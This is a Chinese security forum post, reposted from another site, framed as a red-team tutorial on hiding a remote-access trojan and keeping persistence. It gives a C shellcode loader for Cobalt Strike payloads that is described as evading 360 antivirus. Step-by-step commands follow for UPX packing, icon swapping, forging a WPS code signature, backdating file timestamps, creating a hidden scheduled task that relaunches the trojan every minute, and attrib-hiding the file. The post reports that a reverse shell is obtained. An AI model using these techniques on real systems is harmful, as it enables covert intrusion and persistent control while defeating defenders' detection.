安全矩阵

 找回密码
 立即注册
搜索
查看: 912|回复: 0

攻防|红队视角下的隐匿木马文件 实现持久化控制

[复制链接]

215

主题

215

帖子

701

积分

高级会员

Rank: 4

积分
701
发表于 2023-12-1 21:27:31 | 显示全部楼层 |阅读模式
前言
在红蓝对抗的过程中,远控木马起到了相当重要的作用,而面对蓝队技术人员的种种查杀,远控木马如何在目标机器上长久的存活下去

免杀马制作
cobalt strike生成shellcode.c



可以根据目标机器安装的杀毒软件制作有针对性的免杀马,当然,能够BypassAV是最好不过的了,为了节约时间成本,选择使用申请动态内存的方式加载shellcode生成免杀木马

  1. <p>#include <Windows.h></p><p>#include <stdio.h></p><p>#include <string.h></p><p>#pragma comment(linker,"/subsystem:"Windows" /entry:"mainCRTStartup"") //windows控制台程序不出黑窗口</p><p>unsigned char buf[] = </p><p>"shellcode";</p><p>main()</p><p>{</p><p>  char *Memory; </p><p>  Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);</p><p>  memcpy(Memory, buf, sizeof(buf));</p><p>  ((void(*)())Memory)();</p><p>}</p>
复制代码

可以通过360的静态免杀,动态操作也没有任何报毒提示



文件加壳
这里生成的shellcode为64为的执行代码,使用upx进行加壳

项目地址

https://github.com/upx/upx

.\upx.exe C:\Users\33519\Desktop\shellcode.exe


文件加壳后属性对比



替换图标
使用BeCyIconGrabberPortable提取图标




项目地址
https://github.com/JarlPenguin/BeCyIconGrabberPortable
使用Resource hacker替换木马程序的图标



伪造签名
使用SigThief对木马程序进行数字签名伪造
项目地址
https://github.com/secretsquirrel/SigThief
使用wps的数字签名进行伪造

python .\sigthief.py -i wps.exe -t .\shellcode.exe -o shellcode2.exe


-i 自带签名的文件

-t 未加签名的文件

-o 输出文件
shellcode2为伪造数字签名后的木马文件




伪造文件修改时间
蓝队技术人员通常会在时间顺序上排查攻击者上传的文件,我们上传的木马文件是最新的,所以使用ChTimeStamp伪造文件修改的时间
项目地址
https://github.com/MsF-NTDLL/ChTimeStamp

ChTimeStamp.exe C:\Users\canxue\Desktop\shellcode2.exe "C:\Program Files (x86)\360\360Safe\360bps.dat"



360bps.bat为安装360时创建的文件,时间为一月份
修改前后文件属性对比




通过everything筛查文件不会发现近期上传的木马文件







计划任务隐藏自启动木马程序
使用SchTask创建隐藏的自启动任务
项目地址
https://github.com/0x727/SchTask_0x727/tree/main

选择主机随机进程名作为计划任务程序文件名
将计划任务程序文件复制到 `%AppData%\Microsoft\Windows\Themes\` 中
创建的计划任务名取同一随机进程名
计划任务触发器以分钟为单位,无限期持续
更改 Index、删除 SD 的键值,隐藏计划任务对应的 XML 文件
SchTask.exe shellcode2.exe 1
设置每分钟执行一次计划任务,计划任务为执行shellcode2.exe程序



被隐藏的计划任务,在注册表中可以看到



一分钟后自动执行木马程序,cobalt strike可以正常接收到反弹的shell

可以正常上线,命令也可以正常执行

attrib +s +h +r
使用此命令深度隐藏木马文件,即使打开查看隐藏文件选项也无法显示文件




原文链接:https://xz.aliyun.com/t/12973#toc-4


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 01:54 , Processed in 0.012372 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表